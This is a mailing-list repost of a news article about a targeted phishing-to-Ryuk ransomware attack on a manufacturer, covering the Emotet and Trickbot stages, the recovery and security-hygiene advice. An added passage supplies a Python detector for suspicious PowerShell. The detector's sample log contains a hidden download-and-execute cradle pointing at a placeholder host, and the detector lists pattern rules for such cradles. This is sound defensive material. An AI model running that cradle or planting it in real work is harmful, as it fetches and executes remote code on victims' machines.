[BreachExchange] Ransomware: How clicking on one email left a whole business in big trouble

Destry Winant destry at riskbasedsecurity.com
Fri Jul 31 10:27:01 EDT 2020


https://www.zdnet.com/article/ransomware-how-clicking-on-one-phishing-email-left-a-whole-business-in-big-trouble/

Security experts have given an insight into how a targeted ransomware
attack took down the network of a food and drink manufacturer after
hackers took advantage of common security vulnerabilities.

The crooks used a phishing attack and took advantage of a number of
vulnerabilities – from old hardware to default passwords – to first
deploy Emotet and Trickbot malware before delivering the Ryuk
ransomware and attempting to extort a fee from the victim to restore
the network.


In this case, the organisation didn't opt to pay the ransom –
something that authorities discourage and would only fund additional
attacks by cyber criminals – but instead had security experts come in
to examine the network and restore functionality within 48 hours.

"This was a targeted attack. This is targeting organisations such as
this one which, if they don't have the security retainer or IT staff,
the initial reaction would be to give into the ransomware attack
because they want to return their operations quickly," Bindu
Sundaresan, director at AT&T cybersecurity, told ZDNet.

AT&T investigated the attack and helped the unnamed manufacturer get
back online without giving into a ransom demand while also
experiencing the least amount of disruption to production as possible.
But the company likely would not have fallen victim if basic security
vulnerabilities hadn't allowed the initial stages of the attack to
happen.

Ryuk, like some other forms of ransomware, is deployed as the final
stage in a three-pronged attack that also delivers Emotet and
Trickbot. Emotet started life as a banking trojan before evolving into
a botnet that is leased out to deliver other malware, which in this
case is the Trickbot trojan.


Trickbot is a powerful form of malware that provides attackers with a
full backdoor into compromised systems, including the ability to move
around networks, issue commands and steal additional data.

After this, the hackers download the Ryuk ransomware onto the network,
because cyber criminals view it as the quickest and easiest way to make
money from a compromised network.

While many ransomware campaigns now start with targeting remote ports,
this one began with a phishing attack.

"A user was sent a Microsoft Word document as part of a phishing
campaign. It was labelled as an invoice and this user downloaded the
document, then malicious code executed a PowerShell command that
downloaded an Emotet payload," Sundaresan explained.

PowerShell commands generally aren't required by users who don't need
administrator rights, so if PowerShell had been disabled for those who
don't need it, the cyberattack could've been cut off at this point.
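As an added illustration of the chain described above (not code from the article or from AT&T), the routine below triages constructed process-creation records and flags PowerShell that was launched by an Office parent or that carries a download or decode cradle; the JSON field names, paths and sample command lines are assumptions.

```python
import json
import re

# Parent processes that should essentially never launch a shell on a user's PC.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command-line features of common PowerShell download/decode cradles.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\bcurl\b", re.I),
    re.compile(r"frombase64string|-e(nc|ncodedcommand)\b", re.I),
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def parse_event(line):
    """Parse one JSON process-creation record (field names are assumptions)."""
    rec = json.loads(line)
    return rec["ParentImage"], rec["Image"], rec["CommandLine"]

def classify(event):
    """Return the reasons an event is suspicious; an empty list means not flagged."""
    parent, image, cmdline = event
    if basename(image) not in SHELLS:
        return []
    reasons = []
    if basename(parent) in OFFICE_PARENTS:
        reasons.append("PowerShell spawned by an Office application")
    if any(p.search(cmdline) for p in CRADLE_PATTERNS):
        reasons.append("command line contains a download/decode indicator")
    return reasons

def triage(lines):
    """Return (event, reasons) for every flagged record, in log order."""
    return [(ev, r) for ev in map(parse_event, lines) if (r := classify(ev))]

# Constructed sample records, not telemetry from the incident in the article.
SAMPLE_LOG = [json.dumps(r) for r in [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://invoice.example/doc')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Reports"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh -c Invoke-WebRequest https://updates.example/a.msi -OutFile a.msi"},
]]
```

Running `triage(SAMPLE_LOG)` flags the first record on both grounds and the third on the cradle indicator alone, while the ordinary administrative PowerShell launch passes.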

After Emotet had formed the initial part of the attack and gained a
foothold in the network, the next step was to use the Trickbot malware
to steal login credentials for corporate accounts and cloud services
and so gain access to other parts of the network.

By exploiting this cycle, cyber criminals were able to gain control of
over half the network, before eventually delivering the Ryuk
ransomware.

"Malware like this wants to get the most bang for its buck and go
after organisations that are at the point where they feel like they
need to give in due to the damage it's costing to their network, the
valuable data that's being held – so they have a sense of urgency,"
said Sundaresan.

However, the attack could have been much worse: Ryuk had not
compromised the entire network but about 60% of it, including ordering
and billing applications. This was in part because security personnel
were able to contain the attack after being called in by the
manufacturer.

"The ability to contain it and the response time was crucial. The
ability to contain the incident is the key to recover from it and
having the business up and running before it got to the crucial
databases," Sundaresan explained.

Within 48 hours, much of the business was back up and running again –
crucially without having given into paying a ransom demand to
criminals. However, two days of downtime would have been costly to the
organisation and restoring the network isn't likely to have been cheap
either – plus there's the prospect of having to upgrade security in
the aftermath, so attackers don't strike again.

And like many organisations that fall victim to cyberattacks, this one
could've prevented itself from falling victim to ransomware by
ensuring that cybersecurity hygiene was well managed – but there were
simple-to-fix vulnerabilities that attackers were able to take
advantage of.


For example, the vulnerabilities that Emotet, Trickbot and Ryuk take
advantage of have been known about for a long time and critical
security updates have been issued to protect users – but despite these
updates being years old, there are organisations that still haven't
applied them.

"Microsoft has put out patches but patch management and security
hygiene still remain issues for organisations," said Sundaresan, who
added that this ransomware attack could've also been prevented if
strong passwords and multi-factor authentication had been used to
secure systems.

"A lot of this can be prevented. If they didn't have default passwords
and end-of-life machines, a lot of this would've been prevented."

And when it comes to cyberattacks, prevention is the best cure,
because not only does it stop your organisation from falling victim to
ransomware or other malware, the cost of securing the network in
advance is almost certainly going to be less expensive than having to
do it in the aftermath of an incident – especially if the attack
disrupts operations or causes reputational damage that could keep
customers away.

So while it might potentially seem expensive, it could be very much
worth having security experts from outside the organisation come in to
examine the network before damage can be done – and not after.

"Get a security assessment done from an offensive attacker point of
view, you don't want to be just doing the security initiatives from
compliance or internal testing – it's not enough. You have to get your
network tested using multiple attack vectors and you have to do it
objectively with full penetration testing," Sundaresan said.

Because ultimately, ransomware – be it Ryuk or another family – is
still out there and still remains a threat because too many
organisations aren't following the security basics. And until this is
fixed, ransomware will remain a problem.


More information about the BreachExchange mailing list